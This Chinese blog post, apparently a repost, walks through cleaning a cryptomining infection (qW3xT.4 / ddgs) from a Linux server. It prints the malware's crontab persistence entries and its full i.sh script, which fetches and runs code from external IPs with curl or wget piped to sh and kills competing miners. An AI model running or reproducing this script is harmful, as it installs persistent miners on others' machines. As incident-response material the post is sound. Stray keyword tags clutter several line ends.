记一次 qW3xT.4,解决挖矿病毒。

最近感受个人服务器特别卡,打开数据库都半天,刚开始觉得网咯很差也没太在乎。数据库

利用top命令:服务器

这时候问题出来了,最高cpu占用100%,那我用啥???curl

根据进程id 一看究竟,ps -ef|grep 进程id   this

1.CPU占用最多的前10个进程:
ps auxw|head -1;ps auxw|sort -rn -k3|head -10
2.内存消耗最多的前10个进程
ps auxw|head -1;ps auxw|sort -rn -k4|head -10
3.虚拟内存使用最多的前10个进程
ps auxw|head -1;ps auxw|sort -rn -k5|head -10url

果断 kill 掉这些进程,删除qW3xT.4文件。spa

其中有一个文件比较难删除code

lsattr -a thisxxsblog

chattr -i  thisxxs 进程

这样就能够删除了crontab

删除以后kill掉qW3xT.4该进程,可是一段时间以后,发现该行程又从新启动,确定是有守护进程,观察top命令下的进程,发现一个可疑的进程,直接kill掉。 

一段时间以后,删除的文件从新生成,dds和挖矿的进程又从新执行。此时怀疑是否有计划任务,此时查看计划任务的列表

crontab -l

*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh

原来是它在做祟!删除计划任务 crontab -r

注意这个命令不会下载和执行sh脚本。由于我把管道符去掉了。看到的仅仅是打印的信息。 大概说下这个脚本的意思:

设置环境变量,写定时任务
查看ddgs.3013进程,若是没有该进程,从新下载该文件,而后给它加执行权限,并执行。
批量根据关键字杀进程。
计划任务删除完成以后,这个13又开始运行。太顽固了。

因而我又看计划任务的内容,是不是有东西没有删除干净。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
 
 
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
 
 
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
 
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

发现计划任务在服务器中建立了几个文件,

/var/spool/cron/crontabs/root

/var/spool/cron/root

内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)

将计划任务中建立的文件删除。

最终,这个挖矿病毒终于删除完成
 

反思

问题解决了,过段时间再看看进程状况,应该是没有了,能够说杀的挺完全了

相关文章
相关标签/搜索